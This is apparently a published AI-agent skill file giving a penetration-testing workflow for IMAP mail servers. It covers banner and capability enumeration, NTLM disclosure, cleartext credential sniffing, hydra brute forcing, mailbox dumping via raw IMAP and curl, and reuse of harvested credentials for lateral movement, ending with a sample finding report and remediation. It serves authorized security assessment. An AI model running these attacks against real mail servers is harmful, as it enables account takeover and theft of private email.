pentesting-imap

$npx mdskill add xalgord/xalgorix/pentesting-imap

- Default ports: `143/tcp` (cleartext IMAP) and `993/tcp` (IMAP over TLS / IMAPS). - When `nmap`/banner shows `imap`, an `* OK ... IMAP4` greeting, or Dovecot/Courier/Exchange IMAP. - For credential testing and post-auth mailbox data extraction (emails often hold reusable secrets).

SKILL.md

.github/skills/pentesting-imapView on GitHub ↗
---
name: pentesting-imap
description: Testing IMAP services (default ports 143 cleartext, 993 IMAPS) for weak/default credentials and brute force, NTLM info disclosure, cleartext credential exposure, capability enumeration, and authenticated mailbox access/data extraction via raw IMAP commands and curl during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- imap
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting IMAP (ports 143, 993)

## When to Use
- Default ports: `143/tcp` (cleartext IMAP) and `993/tcp` (IMAP over TLS / IMAPS).
- When `nmap`/banner shows `imap`, an `* OK ... IMAP4` greeting, or Dovecot/Courier/Exchange IMAP.
- For credential testing and post-auth mailbox data extraction (emails often hold reusable secrets).

## Quick Enumeration
```bash
# Cleartext banner
nc -nv <IP> 143

# IMAPS banner
openssl s_client -connect <IP>:993 -quiet

# Capabilities + NTLM info
nmap --script "imap-capabilities or imap-ntlm-info" -sV -p 143,993 <IP>

# Shodan-style discovery markers
#   port:143 CAPABILITY   |   port:993 CAPABILITY
```

## Critical: Checks Most Often Missed
- **Cleartext credentials on 143** — `LOGIN user pass` over port 143 (no STARTTLS) is sniffable.
  - How to CONFIRM: capture with `tcpdump -i eth0 -A 'tcp port 143'` and observe the `A1 LOGIN` line; check `CAPABILITY` for `LOGINDISABLED`/`STARTTLS` absence.
- **NTLM info disclosure** — `AUTHENTICATE NTLM` leaks Windows/domain build info on Exchange.
  - How to CONFIRM:
    ```bash
    nmap -p143 --script imap-ntlm-info <IP>
    # or manual:
    telnet <IP> 143
    a1 AUTHENTICATE NTLM
    TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=   # Type-1; server returns Type-2 with metadata
    ```
- **Weak/default credentials** — reused or guessable mailbox passwords; brute-forceable.
  - How to CONFIRM: `hydra -l <user> -P passwords.txt imap://<IP>` returns a valid login.
- **Authenticated mailbox data exposure** — once logged in, mailboxes frequently contain passwords, internal hostnames, and VPN/onboarding secrets that scanners never read.
  - How to CONFIRM: search bodies for `password` (see curl `TEXT password` below).

## Workflow

### Step 1: Enumerate (capabilities, version, NTLM)
```bash
nc -nv <IP> 143
openssl s_client -connect <IP>:993 -quiet
nmap --script "imap-capabilities or imap-ntlm-info" -sV -p 143,993 <IP>
msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS <IP>; set RPORT 143; run; exit'
```

### Step 2: Authenticate (default creds, brute force)
```bash
# Brute force (use IMAPS port for cleartext-disabled servers)
hydra -L users.txt -P passwords.txt -f imap://<IP>
hydra -l <user> -P passwords.txt -f imaps://<IP>
nxc imap <IP> -u users.txt -p passwords.txt

# Manual login (tagged commands; quote values containing spaces)
openssl s_client -connect <IP>:993 -quiet
A1 LOGIN "username" "password"
```

### Step 3: Exploit / Extract (browse + dump mailboxes)
```bash
# Raw IMAP command flow after login
A1 LIST "" *                       # list all mailboxes/folders
A1 SELECT INBOX                    # open mailbox
A1 STATUS INBOX (MESSAGES UNSEEN RECENT)
A1 FETCH 1:* (FLAGS)               # list messages
A1 FETCH 2 body[text]              # retrieve message body
A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[])
A1 LOGOUT

# curl-driven extraction (IMAPS)
curl -k 'imaps://<IP>/' --user user:pass                       # list mailboxes
curl -k 'imaps://<IP>/INBOX?ALL' --user user:pass              # message indices
curl -k 'imaps://<IP>/Drafts?TEXT password' --user user:pass   # search bodies for "password"
curl -k 'imaps://<IP>/Drafts;MAILINDEX=1' --user user:pass     # download a message

# Pull subject+sender of the first 5 messages
for m in {1..5}; do
  curl -k "imaps://<IP>/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
done
```

### Step 4: Post-access / pivot
- Grep extracted mail for credentials, password-reset links, internal hostnames, and VPN/onboarding details.
- Reuse harvested credentials against SMTP/OWA/SSH/VPN; map internal topology from message headers.
- A GUI client like `evolution` (`apt install evolution`) speeds up manual triage of large mailboxes.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **IMAP vs POP3** | IMAP keeps mail server-side and supports multi-device access and folder structure. |
| **Tagged commands** | Each command is prefixed with a tag (`A1`) the server echoes in its response. |
| **CAPABILITY** | Advertises features such as `STARTTLS`, `LOGINDISABLED`, `AUTH=` mechanisms. |
| **Cleartext exposure** | `LOGIN` on 143 without STARTTLS sends credentials in plaintext. |
| **NTLM disclosure** | `AUTHENTICATE NTLM` on Exchange leaks NetBIOS/DNS/OS build. |
| **Mailbox data mining** | Authenticated `FETCH`/`SEARCH` (or curl) extracts message bodies containing secrets. |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap NSE** | `imap-capabilities`, `imap-ntlm-info`. |
| **nc / openssl s_client** | Banner grab, manual cleartext/TLS IMAP sessions. |
| **curl** | Scriptable mailbox listing, searching, and message download over IMAP(S). |
| **hydra / netexec (nxc)** | Credential brute force / spraying. |
| **Metasploit** | `scanner/imap/imap_version`. |
| **evolution** | GUI client for browsing compromised mailboxes. |
| **tcpdump / Wireshark** | Capture cleartext credentials on port 143. |

## Common Scenarios
### Scenario 1: Cleartext IMAP credential capture
Port 143 lacks STARTTLS. A MitM + `tcpdump 'tcp port 143'` captures `A1 LOGIN user pass` in plaintext, which is then reused on the corporate VPN.

### Scenario 2: Brute force → mailbox secrets
`hydra imaps://<IP>` finds `jdean:PA$$W0RD`. `curl 'imaps://<IP>/INBOX?TEXT password'` surfaces an email containing RDP credentials, enabling lateral movement.

### Scenario 3: Exchange NTLM disclosure
`nmap -p143 --script imap-ntlm-info` returns the NetBIOS name, domain, and OS build, aiding AD reconnaissance and target selection.

## Output Format
```
## IMAP Finding

**Service**: IMAP
**Port**: 143/tcp (Dovecot, STARTTLS not enforced)
**Severity**: High
**Finding**: Cleartext authentication + weak credentials with sensitive mailbox content
**Evidence**:
  - CAPABILITY lacked LOGINDISABLED; tcpdump captured "A1 LOGIN jdean PA$$W0RD"
  - curl 'imaps://<IP>/INBOX?TEXT password' returned message with RDP creds
**Impact**: Credentials are exposed on the wire and mailbox content discloses additional secrets enabling lateral movement.
**Recommendation**:
  1. Enforce TLS (require STARTTLS or IMAPS only; set LOGINDISABLED on 143).
  2. Enforce strong, unique mailbox passwords and rate-limit auth.
  3. Educate users not to store credentials in email.
```

More from xalgord/xalgorix

SkillDescription
abusing-hop-by-hop-headersTesting proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostartEnumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discoveryAPI endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigationsMethodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protectionsIdentifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sipAssessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shellsEscaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otpIdentifying and exploiting flaws in two-factor authentication and one-time password verification
deepExhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rceTesting machine-learning model files and model-loading services for remote code execution caused by insecure